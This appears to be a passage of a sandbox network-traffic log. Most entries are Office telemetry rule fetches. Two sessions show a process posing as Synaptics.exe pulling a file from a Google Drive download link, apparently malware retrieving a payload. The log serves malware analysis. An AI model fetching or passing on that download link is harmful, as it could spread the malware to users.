                                                                                        2024-12-05 21:50:33 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        53192.168.2.54981813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:34 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:34 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                        x-ms-request-id: ddae3c3f-c01e-008d-3acb-452eec000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215034Z-1746fd949bd6zq92hC1EWRry48000000038000000000fezf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:34 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        54192.168.2.54981913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:34 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:35 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                        x-ms-request-id: 85a33a74-901e-005b-1ccd-452005000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215034Z-1746fd949bd7wvgbhC1EWR0rgs000000037g00000000z0t4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:35 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        55192.168.2.54981713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:34 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:35 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 420
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                        x-ms-request-id: de9014ac-301e-0051-7cc5-4538bb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215034Z-1746fd949bdxk6n6hC1EWRdr8c000000031000000000yggp
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:35 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        56192.168.2.54981613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:34 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:35 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:34 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                        x-ms-request-id: 4626c155-d01e-0017-0ecc-45b035000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215034Z-1746fd949bdxk6n6hC1EWRdr8c000000035g00000000ah1k
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        57192.168.2.549825172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:35 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:35 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PFXSNKx7txrgAqxVvRYN8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        58192.168.2.549824172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:35 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:36 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:35 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Czf0owbcEny0BwVskT2kbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        59192.168.2.54982613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:35 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:35 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:35 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 423
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                        x-ms-request-id: 8da67b63-c01e-0034-2ecb-452af6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215035Z-1746fd949bd4w8sthC1EWR7004000000032000000000brpc
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:35 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        60192.168.2.54983013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:36 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:36 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:36 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 478
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                        ETag: "0x8DC582B9B233827"
                                                                                        x-ms-request-id: 9009c19b-701e-0053-74c6-453a0a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215036Z-1746fd949bddtfvqhC1EWRxbpg000000038g000000009wxb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:36 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        61192.168.2.54983313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:36 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:37 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:36 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 400
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                        x-ms-request-id: 00b51f18-a01e-000d-6fcc-45d1ea000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215036Z-1746fd949bd9x4mhhC1EWRb76n00000003bg00000000b6qu
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:37 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        62192.168.2.54983113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:36 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:37 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:36 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 404
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                        x-ms-request-id: 7eb0f396-d01e-0066-0ac6-45ea17000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215036Z-1746fd949bdfg4slhC1EWR34t0000000036000000000a881
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:37 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        63192.168.2.54983213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:36 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:37 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:37 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                        ETag: "0x8DC582BB046B576"
                                                                                        x-ms-request-id: 4ebe80de-801e-0047-51c8-457265000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215037Z-1746fd949bdqpttnhC1EWRe1wg000000032g0000000088af
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
